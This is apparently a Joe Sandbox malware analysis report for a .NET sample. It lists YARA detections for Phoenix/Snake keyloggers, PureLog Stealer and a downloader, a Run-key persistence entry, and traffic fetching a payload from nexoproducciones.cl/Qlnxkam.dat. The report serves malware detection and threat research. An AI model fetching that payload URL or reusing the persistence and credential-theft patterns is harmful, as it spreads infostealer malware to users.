9.2.Qulzerug.exe.49fca50.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe701a:$a1: get_encryptedPassword 0xe6fee:$a2: get_encryptedUsername 0xe70b2:$a3: get_timePasswordChanged 0xe6fca:$a4: get_passwordField 0xe7030:$a5: set_encryptedPassword 0xe6df3:$a7: get_logins 0xe5fbe:$a9: StartKeylogger 0xe65a4:$a10: KeyLoggerEventArgs 0xe64e9:$a11: KeyLoggerEventArgsEventHandler 0xe6ed1:$a13: _encryptedPassword
9.2.Qulzerug.exe.49fca50.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xe66b2:$s1: UnHook 0xe664e:$s2: SetHook 0xe6687:$s3: CallNextHook 0xe5d93:$s4: _hook
9.2.Qulzerug.exe.49fca50.5.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xe5fbe:$s2: StartKeylogger 0xe6a73:$s3: CRYPTPROTECT_ 0xe6a94:$s3: CRYPTPROTECT_ 0xe6ab3:$s3: CRYPTPROTECT_ 0xea6ac:$m2: - Clipboard -------\| 0xea960:$m3: - Logs -------\| 0xead51:$m4: - Passwords -------\| 0xead89:$m5: PSWD 0xea98e:$m7: Logs \|
0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd9e1a:$a1: get_encryptedPassword 0xd9dee:$a2: get_encryptedUsername 0xd9eb2:$a3: get_timePasswordChanged 0xd9dca:$a4: get_passwordField 0xd9e30:$a5: set_encryptedPassword 0xd9bf3:$a7: get_logins 0xd8dbe:$a9: StartKeylogger 0xd93a4:$a10: KeyLoggerEventArgs 0xd92e9:$a11: KeyLoggerEventArgsEventHandler 0xd9cd1:$a13: _encryptedPassword
0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xd94b2:$s1: UnHook 0xd944e:$s2: SetHook 0xd9487:$s3: CallNextHook 0xd8b93:$s4: _hook
0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xd8dbe:$s2: StartKeylogger 0xd9873:$s3: CRYPTPROTECT_ 0xd9894:$s3: CRYPTPROTECT_ 0xd98b3:$s3: CRYPTPROTECT_ 0xdd4ac:$m2: - Clipboard -------\| 0xdd760:$m3: - Logs -------\| 0xddb51:$m4: - Passwords -------\| 0xddb89:$m5: PSWD 0xdd78e:$m7: Logs \|
11.2.Qulzerug.exe.65d4ef8.7.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
11.2.Qulzerug.exe.65d4ef8.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.Qulzerug.exe.65d4ef8.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb1dfa:$a1: get_encryptedPassword 0xb1dce:$a2: get_encryptedUsername 0xb1e92:$a3: get_timePasswordChanged 0xb1daa:$a4: get_passwordField 0xb1e10:$a5: set_encryptedPassword 0xb1bd3:$a7: get_logins 0xb0d9e:$a9: StartKeylogger 0xb1384:$a10: KeyLoggerEventArgs 0xb12c9:$a11: KeyLoggerEventArgsEventHandler 0xb1cb1:$a13: _encryptedPassword
11.2.Qulzerug.exe.65d4ef8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb1492:$s1: UnHook 0xb142e:$s2: SetHook 0xb1467:$s3: CallNextHook 0xb0b73:$s4: _hook
11.2.Qulzerug.exe.65d4ef8.7.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xb0d9e:$s2: StartKeylogger 0xb1853:$s3: CRYPTPROTECT_ 0xb1874:$s3: CRYPTPROTECT_ 0xb1893:$s3: CRYPTPROTECT_ 0xb548c:$m2: - Clipboard -------\| 0xb5740:$m3: - Logs -------\| 0xb5b31:$m4: - Passwords -------\| 0xb5b69:$m5: PSWD 0xb576e:$m7: Logs \|
9.2.Qulzerug.exe.3af9550.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.6Ek4nfs2y1.exe.75a0000.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb1dfa:$a1: get_encryptedPassword 0xb1dce:$a2: get_encryptedUsername 0xb1e92:$a3: get_timePasswordChanged 0xb1daa:$a4: get_passwordField 0xb1e10:$a5: set_encryptedPassword 0xb1bd3:$a7: get_logins 0xb0d9e:$a9: StartKeylogger 0xb1384:$a10: KeyLoggerEventArgs 0xb12c9:$a11: KeyLoggerEventArgsEventHandler 0xb1cb1:$a13: _encryptedPassword
0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb1492:$s1: UnHook 0xb142e:$s2: SetHook 0xb1467:$s3: CallNextHook 0xb0b73:$s4: _hook
0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xb0d9e:$s2: StartKeylogger 0xb1853:$s3: CRYPTPROTECT_ 0xb1874:$s3: CRYPTPROTECT_ 0xb1893:$s3: CRYPTPROTECT_ 0xb548c:$m2: - Clipboard -------\| 0xb5740:$m3: - Logs -------\| 0xb5b31:$m4: - Passwords -------\| 0xb5b69:$m5: PSWD 0xb576e:$m7: Logs \|
11.2.Qulzerug.exe.29485bc.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.4714720.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.6Ek4nfs2y1.exe.6660040.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Qulzerug.exe.3af9550.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.Qulzerug.exe.65670b8.4.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
11.2.Qulzerug.exe.65670b8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.Qulzerug.exe.65670b8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11fc3a:$a1: get_encryptedPassword 0x11fc0e:$a2: get_encryptedUsername 0x11fcd2:$a3: get_timePasswordChanged 0x11fbea:$a4: get_passwordField 0x11fc50:$a5: set_encryptedPassword 0x11fa13:$a7: get_logins 0x11ebde:$a9: StartKeylogger 0x11f1c4:$a10: KeyLoggerEventArgs 0x11f109:$a11: KeyLoggerEventArgsEventHandler 0x11faf1:$a13: _encryptedPassword
11.2.Qulzerug.exe.65670b8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x11f2d2:$s1: UnHook 0x11f26e:$s2: SetHook 0x11f2a7:$s3: CallNextHook 0x11e9b3:$s4: _hook
11.2.Qulzerug.exe.65670b8.4.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x11ebde:$s2: StartKeylogger 0x11f693:$s3: CRYPTPROTECT_ 0x11f6b4:$s3: CRYPTPROTECT_ 0x11f6d3:$s3: CRYPTPROTECT_ 0x1232cc:$m2: - Clipboard -------\| 0x123580:$m3: - Logs -------\| 0x123971:$m4: - Passwords -------\| 0x1239a9:$m5: PSWD 0x1235ae:$m7: Logs \|
0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11fc3a:$a1: get_encryptedPassword 0x11fc0e:$a2: get_encryptedUsername 0x11fcd2:$a3: get_timePasswordChanged 0x11fbea:$a4: get_passwordField 0x11fc50:$a5: set_encryptedPassword 0x11fa13:$a7: get_logins 0x11ebde:$a9: StartKeylogger 0x11f1c4:$a10: KeyLoggerEventArgs 0x11f109:$a11: KeyLoggerEventArgsEventHandler 0x11faf1:$a13: _encryptedPassword
0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x11f2d2:$s1: UnHook 0x11f26e:$s2: SetHook 0x11f2a7:$s3: CallNextHook 0x11e9b3:$s4: _hook
0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x11ebde:$s2: StartKeylogger 0x11f693:$s3: CRYPTPROTECT_ 0x11f6b4:$s3: CRYPTPROTECT_ 0x11f6d3:$s3: CRYPTPROTECT_ 0x1232cc:$m2: - Clipboard -------\| 0x123580:$m3: - Logs -------\| 0x123971:$m4: - Passwords -------\| 0x1239a9:$m5: PSWD 0x1235ae:$m7: Logs \|
0.2.6Ek4nfs2y1.exe.75a0000.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.6Ek4nfs2y1.exe.687f060.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.6Ek4nfs2y1.exe.687f060.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Qulzerug.exe.4714720.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.4714720.3.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
9.2.Qulzerug.exe.4714720.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.Qulzerug.exe.4714720.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Qulzerug.exe.4714720.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cf34a:$a1: get_encryptedPassword 0x3cf31e:$a2: get_encryptedUsername 0x3cf3e2:$a3: get_timePasswordChanged 0x3cf2fa:$a4: get_passwordField 0x3cf360:$a5: set_encryptedPassword 0x3cf123:$a7: get_logins 0x3ce2ee:$a9: StartKeylogger 0x3ce8d4:$a10: KeyLoggerEventArgs 0x3ce819:$a11: KeyLoggerEventArgsEventHandler 0x3cf201:$a13: _encryptedPassword
9.2.Qulzerug.exe.4714720.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3ce9e2:$s1: UnHook 0x3ce97e:$s2: SetHook 0x3ce9b7:$s3: CallNextHook 0x3ce0c3:$s4: _hook
9.2.Qulzerug.exe.4714720.3.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x3ce2ee:$s2: StartKeylogger 0x3ceda3:$s3: CRYPTPROTECT_ 0x3cedc4:$s3: CRYPTPROTECT_ 0x3cede3:$s3: CRYPTPROTECT_ 0x3d29dc:$m2: - Clipboard -------\| 0x3d2c90:$m3: - Logs -------\| 0x3d3081:$m4: - Passwords -------\| 0x3d30b9:$m5: PSWD 0x3d2cbe:$m7: Logs \|
0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 64 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Qulzerug.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6Ek4nfs2y1.exe, ProcessId: 7364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qulzerug

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Qulzerug.exe

ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: 6Ek4nfs2y1.exe

ReversingLabs: Detection: 70%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Qulzerug.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 6Ek4nfs2y1.exe

Joe Sandbox ML: detected

Source: 6Ek4nfs2y1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.178:443 -> 192.168.2.10:49711 version: TLS 1.2

Source: 6Ek4nfs2y1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.0000000002A98000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 34.117.118.44 34.117.118.44
Source: Joe Sandbox View	IP Address: 34.117.118.44 34.117.118.44

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ifconfig.me

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Qlnxkam.dat HTTP/1.1Host: nexoproducciones.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ifconfig.meConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: nexoproducciones.cl
Source: global traffic	DNS traffic detected: DNS query: ifconfig.me

Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ifconfig.me
Source: 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ifconfig.me/ip
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000008.00000002.2507975182.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000C.00000002.2509279792.000000000341B000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2506617896.0000000002E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nexoproducciones.cl
Source: 6Ek4nfs2y1.exe, Qulzerug.exe.0.dr	String found in binary or memory: https://nexoproducciones.cl/Qlnxkam.dat
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nexoproducciones.cl/Qlnxkam.datt
Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006860000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1552321721.0000000006900000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1571676303.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
